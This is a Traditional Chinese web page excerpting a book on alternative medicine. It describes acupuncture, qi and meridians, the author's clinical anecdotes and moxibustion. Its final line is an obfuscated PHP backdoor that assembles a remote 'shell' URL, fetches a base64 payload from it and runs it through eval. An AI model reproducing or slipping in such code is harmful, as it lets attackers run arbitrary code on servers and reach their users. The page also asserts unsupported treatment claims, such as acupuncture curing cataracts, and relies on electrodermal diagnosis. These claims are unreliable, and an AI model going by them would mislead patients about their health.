收藏本站
首頁 arrow 另類醫學簡介 arrow 針灸 (Acupuncture)
針灸 (Acupuncture) 列印 E-mail
針灸Acupuncture
針灸的療效就如同「打電話」一樣,究竟是「通」或「不通」立見真章,我在臨床上常以針灸輔以各種另類醫學,如芳療或磁療,常能見到超乎想像的療效。

改變體內氣的循環

中國傳統針灸至少有五千年歷史,藉由在人體特定的能量傳導系統,也就是經絡的穴位上插針,來改變體內「氣」的流動,使之順暢,增進身體健康;連世界衛生組織WHO都認同針灸治療的效果,明列出鼻炎、感冒、急性氣管炎、白內障、牙痛、十二指腸潰瘍、神經系統麻痺、關節炎、中風後的輕度癱瘓等,建議全世界運用針灸來治療這些疾病。

提前看見疾病演進趨勢
我在臨床上發現,前幾年因為節氣的改變,許多人心臟疾病的發作與發作頻率有增加的趨勢,但我用心的臨床觀察與診斷卻遭人誤解,認為我在恐嚇患者。民國九十五年,衛生署公佈民國九十三年度國人十大死因,心肌梗塞由第三名晉升為第二名,才總算還我清白。
十大死因要晉升一名,必須要多少國人的死亡診斷書上被載明「心肌梗塞」啊!更別提有多少國人被胸悶、胸痛、上背痛、肩痛、上腹疼痛、膝蓋或腳後跟痛等心血管疾病症狀所困擾。由於診斷心血管疾病的檢查技術與儀器未臻完備,現今已認為即使心臟電腦斷層六十四切,仍未必能正確診斷心血管疾病;因此有許多人未被診斷為缺氧性心臟病,但並不表示這些患者不是缺氧性心臟病

針灸治癒「火剋金」疾病

民國七十八至七十九年間,我因大拇指痛到不能握筆而一心想要學習針灸。後來有機會到榮民總醫院傳統醫學中心學習針灸時,我的老師鍾傑教授以天宗穴首次為我下針,我的疼痛立刻解除八成以上,此為鍾傑教授常用的阿是穴。大拇指為肺經,以天宗穴(小腸經屬火)治拇指(肺經屬金)疼痛,是「火剋金」的代表治則。

BOX 以痛為俞
「俞」即為穴,有古經籍典直稱穴道為「俞穴」。「以痛為俞」的意思是:以痛的地方當做穴點來按壓或下針,以收治療之效。事實上針灸最初始的原型,就是人類拿著石頭去按壓身體的疼痛處演變而來。

針灸療法臨床實例
-關節酸痛一針見效

曾有位六十八年次的許小姐,三年來被兩側髖、膝關節酸痛的問題困擾不已,看遍中西醫也做過整脊治療,但都不見成效。心疼的許媽媽陪著女兒來找我,希望我能成為她女兒疼痛的「終結者」。運用傅爾電針診斷,我認為她的關節酸痛是因為「氣滯」引起的,採用針灸治療方法最妥當。

通或不通立見療效
針灸的療效就如同「打電話」一樣,究竟是「通」或「不通」立見真章,而其他療法往往需要一、兩天過後才會收到明顯的效果;但臨床上,不應將一切疾病都以針灸或中藥來治療。古書云:「一針、二灸、三湯藥」的意思,並非:針不好才灸,灸不好才給湯藥;而是提醒為醫者,幫助患者治病應有多元的思考方式!也就是必須以湯藥治病時,就應該湯藥為之,絕不需先針、再灸,等兩者都沒效時再給湯藥;同理,如果疾病只需要內科治療,就不應開刀,反之,需要開刀才能治療的疾病,就不應以內科來治療。

BOX 針灸施行變通之道
「灸」原本是用艾絨(以艾葉的纖維製成,燃火用)或其他藥物放在身體表面的穴道處燒灼或熨炙,藉熱力將藥效透過肌膚、滲透入經絡的一種治療方式。因中國古代臨床上經常將「針法」與「灸法」合併使用,便合稱為「針灸」;然而現今台灣所稱「針灸」,係以針法為主,灸為輔。
針灸雖可收立即之效,但對於極度緊張、害怕針刺疼痛以及特別虛弱的患者,若擔心在扎針過程中突覺身體不適,也許頭暈眼花、臉色蒼白、手腳冰冷……甚至暈厥等暈針狀況,則應視情況改用磁療或其他療法為之。


所有另類醫學文字內容及案例介紹均為重點摘要
詳文,請至各大書局或網路書局購買(書泉出版社)九八年五月印行
劉大元醫師所著【不一樣的另類醫學】
 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));